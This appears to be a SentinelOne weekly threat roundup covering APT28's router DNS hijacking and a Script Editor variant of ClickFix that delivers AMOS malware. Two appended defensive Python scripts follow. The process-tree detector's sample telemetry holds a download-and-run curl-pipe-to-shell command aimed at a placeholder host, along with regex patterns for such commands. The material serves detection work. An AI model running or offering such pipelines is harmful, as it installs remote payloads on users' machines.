Apr 10, 2026 • SentinelOne
The Good, the Bad and the Ugly in Cybersecurity – Week 15
Executive Summary
This week's cybersecurity landscape highlights significant state-sponsored activities and evolving malware delivery mechanisms. Russian GRU Unit 26165 (APT28) conducted a DNS hijacking campaign compromising thousands of TP-Link routers across the U.S. to steal credentials from government and critical infrastructure sectors. The FBI disrupted this network via Operation Masquerade. Simultaneously, Iranian APT actors targeted U.S. operational technology, exploiting Rockwell Automation PLCs and causing operational disruptions. In the consumer sector, threat actors bypassed Apple's Terminal mitigations using Script Editor to deliver AMOS and Atomic Stealer malware via social engineering. This infostealer targets browser data and crypto wallets. Organizations should prioritize router firmware updates, monitor OT network traffic for anomalies, and educate macOS users against executing scripts from untrusted sources. Immediate mitigation includes resetting DNS configurations and applying vendor patches for PLCs and routers to prevent unauthorized access and data exfiltration.
Summary
FBI disrupts GRU router hijacking operation, ClickFix sidesteps Apple's Terminal mitigation, and Iranian actors exploit PLCs across U.S. infrastructure.
Published Analysis
The Good | DoJ Disrupts TP-Link Router Network Run by Russian Spy Org
This week, authorities in the U.S. carried out Operation Masquerade, a court-authorized operation to disrupt a DNS hijacking network run by Russia’s GRU Unit 26165 (APT28). The network involved the compromise of thousands of TP-Link small office/home office routers, spread across more than 23 U.S. states. Since at least 2024, APT28 operators have been exploiting known vulnerabilities in the devices to steal credentials, gain unauthorized access to router management interfaces, and silently rewrite DNS settings so that queries were redirected to GRU-controlled resolvers instead of the users’ normal providers.
The actors then applied automated filtering on the hijacked traffic to pick out DNS requests of intelligence interest. For selected targets, the resolvers returned forged DNS records for specific domains to insert GRU-controlled infrastructure into encrypted sessions. This allowed operators to collect passwords, authentication tokens, emails, and other sensitive data from devices on the same networks as the compromised routers, including users in government, military, and critical infrastructure sectors.
Catalin Cimpanu (@campuscodi.risky.biz), 7 April 2026 at 17:10: "Russian espionage group APT28 compromised MikroTik and TP-Link routers to redirect traffic for certain authentication operations to AitM phishing kits" www.lumen.com/blog-and-new…
Under court supervision, the FBI developed and deployed a series of commands to send to compromised routers. The operation captured evidence of GRU activity and reset the DNS configuration so the devices would obtain legitimate resolvers from their ISPs. It also blocked the original path the actors used for unauthorized access. According to DOJ, the FBI first tested the command set on the same TP-Link router models and firmware in a controlled environment, with the goal of leaving normal routing functions intact, avoiding access to any user content, and ensuring that owners could reverse the changes via a factory reset or the web management interface. The bureau is now working with U.S. internet service providers to notify customers whose routers fell within the scope of the warrant.
The Bad | Threat Actors Turn to Script Editor to Bypass Apple’s ClickFix Mitigation
SentinelOne researchers have discovered a variant of the ClickFix social engineering trick targeting macOS users that avoids the need for victims to unwittingly copy-paste commands into the Terminal. Apple recently updated the desktop operating system to include a mitigation for Terminal-driven ClickFix attacks, but threat actors have moved quickly to sidestep Apple’s response. SentinelOne researchers discovered a campaign in which threat actors used a lure to install the popular AI assistant Claude to deliver AMOS malware. The lure leverages the applescript:// URL scheme to launch the Script Editor from the user’s browser, with the editor pre-populated with malicious commands. The delivery mechanism offers threat actors a smooth, Terminal-free attack flow that simply asks the user to perform a few clicks, with no copy-paste involved.
[Figure: Instructions to victims]
[Figure: Script Editor opens with pre-populated malicious commands]
Analysis of the payloads shows the technique is being used to deliver AMOS/Atomic Stealer malware that reaches out to hardcoded C2 infrastructure and attempts to exfiltrate browser data, crypto wallets and password stores in a single run. SentinelOne customers are protected against AMOS and similar variants of infostealer. Researchers at JAMF later described a similar campaign using a webpage themed to look like an official Apple help page with instructions on how to reclaim disk space....
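The router DNS hijacking described in The Good section rewrites the resolver a router hands out and then returns forged records for selected domains. As an added example (not from the original post or SentinelOne), here is a client-side check a defender can run behind a router: it verifies the configured resolver falls inside expected ranges and compares A-record answers for sensitive domains between the local resolver and an independent DNS-over-HTTPS resolver. The domain list, the CIDR list and the use of Google's JSON DoH endpoint are assumptions.

```python
"""Detect router-level DNS hijacking from a client: is the resolver the
router handed out in an expected range, and do answers for sensitive
domains agree with an independent DNS-over-HTTPS resolver?
Domain list, expected ranges and the DoH endpoint are assumptions."""
import ipaddress
import json
import socket
import urllib.request


def resolver_is_expected(resolver_ip, expected_cidrs):
    """True if the configured resolver lies inside an expected range
    (the router's own LAN address or the ISP's published resolver prefixes)."""
    addr = ipaddress.ip_address(resolver_ip)
    return any(addr in ipaddress.ip_network(cidr) for cidr in expected_cidrs)


def divergent_domains(local_answers, trusted_answers):
    """Domains whose local answer set shares no address with the trusted set.
    CDNs rotate addresses legitimately, so partial overlap is not flagged;
    a fully disjoint answer set is the forged-record pattern."""
    flagged = []
    for domain, trusted in trusted_answers.items():
        local = local_answers.get(domain, set())
        if local and trusted and local.isdisjoint(trusted):
            flagged.append(domain)
    return sorted(flagged)


def resolve_local(domain):
    """A records via the system resolver, i.e. whatever DNS the router handed out."""
    return {info[4][0] for info in socket.getaddrinfo(domain, 443, socket.AF_INET)}


def resolve_doh(domain):
    """A records via Google's public DNS-over-HTTPS JSON API, bypassing the router."""
    url = f"https://dns.google/resolve?name={domain}&type=A"
    with urllib.request.urlopen(url, timeout=5) as resp:
        body = json.load(resp)
    return {rr["data"] for rr in body.get("Answer", []) if rr.get("type") == 1}


if __name__ == "__main__":
    # Sensitive domains (assumed list) and the resolver/ranges to trust (assumed).
    domains = ["login.microsoftonline.com", "accounts.google.com"]
    print("resolver ok:", resolver_is_expected("192.168.1.1", ["192.168.0.0/16"]))
    local = {d: resolve_local(d) for d in domains}
    trusted = {d: resolve_doh(d) for d in domains}
    print("divergent domains:", divergent_domains(local, trusted))
```

A resolver outside the expected ranges, or any domain with a fully disjoint answer set, is the signal to reset the router's DNS settings and re-check from a clean network.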
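The Script Editor variant of ClickFix described in The Bad section ends with the user running pre-populated commands, which on macOS surface as a shell spawned beneath Script Editor (or osascript) that fetches remote content and hands it to an interpreter. As an added example (not SentinelOne's detection logic), here is a process-tree check over endpoint telemetry; the JSON-lines event schema (pid, ppid, name, cmdline) and the sample events are constructed.

```python
"""Flag the Script Editor ClickFix chain in process telemetry: a shell whose
ancestry includes Script Editor or osascript and whose command line fetches
remote content and pipes it into an interpreter. Schema and samples are constructed."""
import json
import re

SCRIPT_HOSTS = {"Script Editor", "osascript"}
SHELLS = {"sh", "bash", "zsh"}
FETCH_RE = re.compile(r"\b(curl|wget)\b")
HANDOFF_RE = re.compile(r"\|\s*(sh|bash|zsh|osascript|python3?)\b|\bchmod\s+\+x\b")


def ancestors(event, by_pid):
    """Walk the parent chain, stopping at the root or on a cycle."""
    seen, chain = set(), []
    parent = by_pid.get(event["ppid"])
    while parent and parent["pid"] not in seen:
        seen.add(parent["pid"])
        chain.append(parent)
        parent = by_pid.get(parent["ppid"])
    return chain


def is_suspicious(event, by_pid):
    """Shell spawned under a script host that downloads and executes content."""
    if event["name"] not in SHELLS:
        return False
    if not any(a["name"] in SCRIPT_HOSTS for a in ancestors(event, by_pid)):
        return False
    cmd = event["cmdline"]
    return bool(FETCH_RE.search(cmd) and HANDOFF_RE.search(cmd))


def find_suspicious(jsonl):
    """Return pids of suspicious events from a JSON-lines telemetry dump."""
    events = [json.loads(line) for line in jsonl.splitlines() if line.strip()]
    by_pid = {e["pid"]: e for e in events}
    return [e["pid"] for e in events if is_suspicious(e, by_pid)]


# Constructed telemetry: launchd -> Script Editor -> sh (download-and-run), a
# benign Script Editor child, and a user's own curl pipeline in Terminal (not flagged).
SAMPLE = """
{"pid": 1, "ppid": 0, "name": "launchd", "cmdline": "/sbin/launchd"}
{"pid": 400, "ppid": 1, "name": "Script Editor", "cmdline": "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor"}
{"pid": 401, "ppid": 400, "name": "sh", "cmdline": "sh -c curl -fsSL https://update.example.invalid/s | sh"}
{"pid": 402, "ppid": 400, "name": "sh", "cmdline": "sh -c ls ~/Desktop"}
{"pid": 500, "ppid": 1, "name": "Terminal", "cmdline": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"}
{"pid": 501, "ppid": 500, "name": "bash", "cmdline": "bash -c curl -fsSL https://example.invalid/file.tgz | sh"}
"""

if __name__ == "__main__":
    print("suspicious pids:", find_suspicious(SAMPLE))
```

The Terminal-driven pipeline (pid 501) is left to Apple's existing Terminal mitigation and separate rules; this check is scoped to the Script Editor path the campaign uses.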
Linked Entities
- AMOS
- Atomic Stealer
- APT28
- GRU Unit 26165
- Iranian APT